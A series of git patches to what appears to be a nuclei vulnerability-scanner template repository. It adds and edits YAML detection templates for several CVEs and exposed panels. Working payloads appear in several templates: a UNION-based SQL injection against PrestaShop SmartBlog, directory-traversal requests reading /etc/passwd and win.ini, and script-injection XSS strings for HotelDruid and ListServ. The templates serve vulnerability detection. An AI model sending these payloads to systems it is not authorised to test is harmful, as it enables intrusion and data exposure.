cves/2021/CVE-2021-37538.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-37538.yaml diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml new file mode 100644 index 0000000000..ebfa5cf37b --- /dev/null +++ b/cves/2021/CVE-2021-37538.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-37538 + +info: + name: PrestaShop SmartBlog SQL Injection + author: whoever + severity: high + description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. + tags: cve,cve2021,prestashop,smartblog,smartdatasoft,sqli + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 + - https://blog.sorcery.ie/posts/smartblog_sqli/ + +requests: + - raw: + - | + GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "c5fe25896e49ddfe996db7508cf00534" + part: body From 63e208e3d7c189de7ec170cf93a8c3e3d90c9e35 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 24 Aug 2021 14:47:25 +0700 Subject: [PATCH 1825/4083] Update CVE-2021-21234.yaml --- cves/2021/CVE-2021-21234.yaml | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index d6e37c4243..892042483b 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -2,15 +2,22 @@ id: CVE-2021-21234 info: name: Spring Boot Actuator Logview - Directory Traversal - author: gy741 + author: gy741,pikpikcu severity: high - reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 + description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. + reference: | + - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 + - https://github.com/cristianeph/vulnerability-actuator-log-viewer tags: cve,cve2021,springboot,lfi requests: - method: GET path: - - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../" + - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" #Windows + - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" #windows + - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" #linux + - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" #linux matchers-condition: and matchers: @@ -18,6 +25,10 @@ requests: part: body regex: - "root:.*:0:0" + - type: word + part: body + words: + - "for 16-bit app support" - type: status status: From ecd6547d05f93c2efe745be7f69ebb609e53c43f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 24 Aug 2021 14:56:21 +0700 Subject: [PATCH 1826/4083] Update thinkific-redirect.yaml --- vulnerabilities/other/thinkific-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml index ca90de4a46..05a87a54d0 100644 --- a/vulnerabilities/other/thinkific-redirect.yaml +++ b/vulnerabilities/other/thinkific-redirect.yaml @@ -3,7 +3,7 @@ id: thinkific-redirect info: name: Open Redirect vulnerability on thinkific websites author: Gal Nagli - severity: Medium + severity: medium tags: redirect From bdd2f700beea421085f9d5e917471fb52966769e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:16:14 +0530 Subject: [PATCH 1827/4083] Update CVE-2021-21234.yaml --- cves/2021/CVE-2021-21234.yaml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index 892042483b..37b0a51eea 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -7,29 +7,29 @@ info: description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. reference: | - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 - https://github.com/cristianeph/vulnerability-actuator-log-viewer + - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 tags: cve,cve2021,springboot,lfi requests: - method: GET path: - - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" #Windows - - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" #windows - - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" #linux - - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" #linux + - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows + - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # windows + - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux + - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux - matchers-condition: and + matchers-condition: or matchers: - type: regex part: body regex: - "root:.*:0:0" - - type: word - part: body - words: - - "for 16-bit app support" - - type: status - status: - - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From d173f5347e66e89b9c42b4982b97df3ee1fea38d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:21:38 +0530 Subject: [PATCH 1828/4083] Update lutron-iot-default-login.yaml --- iot/lutron-iot-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/iot/lutron-iot-default-login.yaml b/iot/lutron-iot-default-login.yaml index 8162cb26c0..9f80864342 100644 --- a/iot/lutron-iot-default-login.yaml +++ b/iot/lutron-iot-default-login.yaml @@ -5,7 +5,7 @@ info: reference: https://www.lutron.com author: geeknik severity: high - tags: iot,default-login,lutron + tags: iot,default-login,lutron,panel requests: - method: GET From 30f9a9f535adac3cf48a47735d941ac71cf8066b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:22:33 +0530 Subject: [PATCH 1829/4083] Update epmp-login.yaml --- iot/epmp-login.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/iot/epmp-login.yaml b/iot/epmp-login.yaml index ec48e002aa..faccd694fc 100644 --- a/iot/epmp-login.yaml +++ b/iot/epmp-login.yaml @@ -5,18 +5,20 @@ info: author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6826 - tags: iot + tags: iot,panel requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - 'ePMP' part: body + - type: status status: - 200 From fe4783d5f01b7c120dec54c5f9f5c95d0b521b9a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 14:23:31 +0530 Subject: [PATCH 1830/4083] Update nuuno-network-login.yaml --- iot/nuuno-network-login.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/iot/nuuno-network-login.yaml b/iot/nuuno-network-login.yaml index 79d1d61f79..e77146c372 100644 --- a/iot/nuuno-network-login.yaml +++ b/iot/nuuno-network-login.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6840 - tags: iot + tags: iot,panel requests: - method: GET @@ -17,6 +17,8 @@ requests: - type: word words: - 'NUUO Network Video Recorder Login' + part: body + - type: status status: - 200 From 8361cbe8c3fad0029d29b029c1edecf3efd158fb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 15:19:47 +0530 Subject: [PATCH 1831/4083] Update CVE-2021-21234.yaml --- cves/2021/CVE-2021-21234.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index 37b0a51eea..cbfbd7cb86 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -5,7 +5,7 @@ info: author: gy741,pikpikcu severity: high description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. - reference: | + reference: - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 - https://github.com/cristianeph/vulnerability-actuator-log-viewer - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 From 7592638eced3087c47dcf1d0703ceff120993974 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 16:01:12 +0530 Subject: [PATCH 1832/4083] Update CVE-2019-8937.yaml --- cves/2019/CVE-2019-8937.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 3e7aef68bc..d388c0c668 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -5,7 +5,7 @@ info: author: Borna Nematzadeh severity: medium refrense: https://www.exploit-db.com/exploits/46429 - tags: cve,xss + tags: cve,xss,cve2019 requests: - method: GET @@ -26,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header From 03d1abe23b07154465905ded79dcc03acf838b99 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 16:26:03 +0530 Subject: [PATCH 1833/4083] Update CVE-2019-8937.yaml --- cves/2019/CVE-2019-8937.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index d388c0c668..2a1fd1cdd8 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -5,22 +5,23 @@ info: author: Borna Nematzadeh severity: medium refrense: https://www.exploit-db.com/exploits/46429 - tags: cve,xss,cve2019 + tags: cve,xss,cve2019,hoteldruid requests: - method: GET path: - - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671">' - - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' - - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' - - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' - - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' - - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' +# - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' +# - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' +# - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' +# - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' +# - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + matchers-condition: and matchers: - type: word words: - - '">' + - '"' part: body - type: word From d1065cd3fc36133853759a5e22da32eb11c731c1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 16:42:11 +0530 Subject: [PATCH 1834/4083] Create unauth-hoteldruid-panel.yaml --- .../other/unauth-hoteldruid-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/unauth-hoteldruid-panel.yaml diff --git a/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/vulnerabilities/other/unauth-hoteldruid-panel.yaml new file mode 100644 index 0000000000..6e2871ccc8 --- /dev/null +++ b/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -0,0 +1,27 @@ +id: unauth-hoteldruid-panel +info: + name: Unauthenticated Hoteldruid Panel + author: princechaddha + severity: high + reference: https://www.hoteldruid.com/ + tags: hoteldruid,panel,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/hoteldruid/inizio.php" + - "{{BaseURL}}/inizio.php" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - " HotelDruid " + - "INSERT:" + - "TABLES:" + condition: and From ba03c2b3771cef104f8e358fcabe598608833bd7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 16:46:24 +0530 Subject: [PATCH 1835/4083] Update unauth-hoteldruid-panel.yaml --- vulnerabilities/other/unauth-hoteldruid-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/vulnerabilities/other/unauth-hoteldruid-panel.yaml index 6e2871ccc8..bdf29a8c0c 100644 --- a/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/hoteldruid/inizio.php" - - "{{BaseURL}}/inizio.php" + - "{{BaseURL}}/inizio.php" matchers-condition: and matchers: From b1fdcd003e4d448af3a20df0edd18f297216ced4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 16:52:44 +0530 Subject: [PATCH 1836/4083] Update CVE-2019-8937.yaml --- cves/2019/CVE-2019-8937.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 2a1fd1cdd8..167c0a4d65 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -5,17 +5,17 @@ info: author: Borna Nematzadeh severity: medium refrense: https://www.exploit-db.com/exploits/46429 - tags: cve,xss,cve2019,hoteldruid + tags: cve,cve2019,xss,hoteldruid requests: - method: GET path: - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' -# - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' -# - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' -# - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' -# - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' matchers-condition: and matchers: From d9cdbb4e97ed567ddbcc763856ce4a56c56aa294 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:07:33 +0530 Subject: [PATCH 1837/4083] Update CVE-2019-15501.yaml --- cves/2019/CVE-2019-15501.yaml | 20 ++++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index b6d85a69fc..76a4f68286 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -4,21 +4,29 @@ info: name: LSoft ListServ - XSS author: Borna Nematzadeh severity: medium - refrense: https://www.exploit-db.com/exploits/47302 - tags: cve,xss + reference: | + - https://www.exploit-db.com/exploits/47302 + - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 + tags: cve,cve2019,xss requests: - method: GET path: - - '{{BaseURL}}/scripts/wa.exe?OK=' + - '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - "text/html" part: header + words: + - text/html + + - type: status + status: + - 200 From 0a4cd456bffd760ec8de18f5b979fbe9cbc3c49e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:13:17 +0530 Subject: [PATCH 1838/4083] Update commax-biometric-access-control-system-auth-bypass.yaml --- .../commax-biometric-access-control-system-auth-bypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml index a6afb6744c..8e1585edee 100644 --- a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml +++ b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. - reference: | + reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php tags: commax,auth-bypass From 20eecc57de8b53e1a83ebbf81bc0db1f021777d2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 17:13:37 +0530 Subject: [PATCH 1839/4083] Update CVE-2019-15501.yaml --- cves/2019/CVE-2019-15501.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 76a4f68286..8101dd4fbe 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -4,7 +4,7 @@ info: name: LSoft ListServ - XSS author: Borna Nematzadeh severity: medium - reference: | + reference: - https://www.exploit-db.com/exploits/47302 - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 From 554c4a505f20a634b3f55073cbad0aea129f6eae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 24 Aug 2021 17:17:43 +0530 Subject: [PATCH 1840/4083] Update and rename commax-biometric-access-control-system-auth-bypass.yaml to commax-biometric-auth-bypass.yaml --- ...em-auth-bypass.yaml => commax-biometric-auth-bypass.yaml} | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) rename vulnerabilities/other/{commax-biometric-access-control-system-auth-bypass.yaml => commax-biometric-auth-bypass.yaml} (92%) diff --git a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml similarity index 92% rename from vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml rename to vulnerabilities/other/commax-biometric-auth-bypass.yaml index 8e1585edee..dfdc0ae4a8 100644 --- a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml +++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -1,4 +1,4 @@ -id: commax-biometric-access-control-system-auth-bypass +id: commax-biometric-auth-bypass info: name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass @@ -6,6 +6,7 @@ info: severity: critical description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. reference: + - https://www.exploit-db.com/exploits/50206 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php tags: commax,auth-bypass @@ -27,8 +28,6 @@ requests: - type: word words: - "::: COMMAX :::" - - "COMMAX" - condition: or - type: word part: header From ee37e34f5440b46fddd3089e1db5d09ac0d380d4 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 24 Aug 2021 17:48:31 +0530 Subject: [PATCH 1841/4083] Update wp-woocommerce-pdf-invoice-listing.yaml --- .../wordpress/wp-woocommerce-pdf-invoice-listing.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 6ca5d17599..d7670dd3da 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -1,7 +1,7 @@ id: wp-woocommerce-pdf-invoice-listing info: - name: WordPress Upload Fuzzing + name: Woocommerce PDF Invoice Exposure author: mohammedsaneem,sec_hawk severity: medium description: Allows attacker to view sensitive information such as company invoices @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 7d6a6c137a22acf4a797bab040e5f25d4154c05e Mon Sep 17 00:00:00 2001 From: socketz Date: Tue, 24 Aug 2021 14:43:45 +0200 Subject: [PATCH 1842/4083] Added CVE-2020-11420 --- cves/2020/CVE-2020-11420.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml new file mode 100644 index 0000000000..e418ec32b9 --- /dev/null +++ b/cves/2020/CVE-2020-11420.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-11420 + +info: + name: ABB UPS Adapter CS141 – Path traversal + author: socketz + severity: medium + description: | + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path + Traversal or Directory Traversal. + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + and then you can exploit it, before that, you should wait. + reference: | + - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf + tags: cve,cve2020,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: + - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body + From 5410d9ab85ba7438cfeb79b5bfa5ec3f0f2361f1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 18:35:13 +0530 Subject: [PATCH 1843/4083] minor update --- cves/2021/CVE-2021-37538.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index ebfa5cf37b..758e66491c 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -5,16 +5,15 @@ info: author: whoever severity: high description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. - tags: cve,cve2021,prestashop,smartblog,smartdatasoft,sqli + tags: cve,cve2021,prestashop,smartblog,sqli reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ requests: - - raw: - - | - GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-" matchers-condition: and matchers: From 0ec8230921c4e278bec78ed4ea7953417e88c188 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 18:46:58 +0530 Subject: [PATCH 1844/4083] Added Teradici PCoIP Detection --- technologies/teradici-pcoip.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/teradici-pcoip.yaml diff --git a/technologies/teradici-pcoip.yaml b/technologies/teradici-pcoip.yaml new file mode 100644 index 0000000000..2fcaf22733 --- /dev/null +++ b/technologies/teradici-pcoip.yaml @@ -0,0 +1,23 @@ +id: teradici-pcoip + +info: + name: Teradici PCoIP Detection + author: pdteam + severity: info + tags: tech,pcoip + +requests: + - method: GET + path: + - "{{BaseURL}}/info/" + + matchers: + - type: word + words: + - "PCoIP Connection Manager" + + extractors: + - type: regex + group: 1 + regex: + - 'PCoIP Connection Manager\/([0-9.]+)\.' \ No newline at end of file From d21e19e47b506c83fc39fdfb01f6d9f802169b41 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 22:54:33 +0530 Subject: [PATCH 1845/4083] Create honeywell-web-controller.yaml --- exposed-panels/honeywell-web-controller.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/honeywell-web-controller.yaml diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml new file mode 100644 index 0000000000..21a061ba40 --- /dev/null +++ b/exposed-panels/honeywell-web-controller.yaml @@ -0,0 +1,22 @@ +id: honeywell-web-controller + +info: + name: Honeywell XL Web Controller + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7130 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/standard/default.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Honeywell XL Web Controller' + - type: status + status: + - 200 From 8ee3ca49fc71e909d49aded383aa6b1b2faa9445 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Aug 2021 22:56:07 +0530 Subject: [PATCH 1846/4083] Create ibm-note-login.yaml --- exposed-panels/ibm-note-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/ibm-note-login.yaml diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm-note-login.yaml new file mode 100644 index 0000000000..b91e156e27 --- /dev/null +++ b/exposed-panels/ibm-note-login.yaml @@ -0,0 +1,22 @@ +id: ibm-note-login + +info: + name: IBM iNotes Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7122 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/names.nsf' + + matchers-condition: and + matchers: + - type: word + words: + - 'IBM iNotes Login' + - type: status + status: + - 200 From 60e28168153d18f51200bf6f00b01d850b33aef6 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Tue, 24 Aug 2021 10:29:51 -0700 Subject: [PATCH 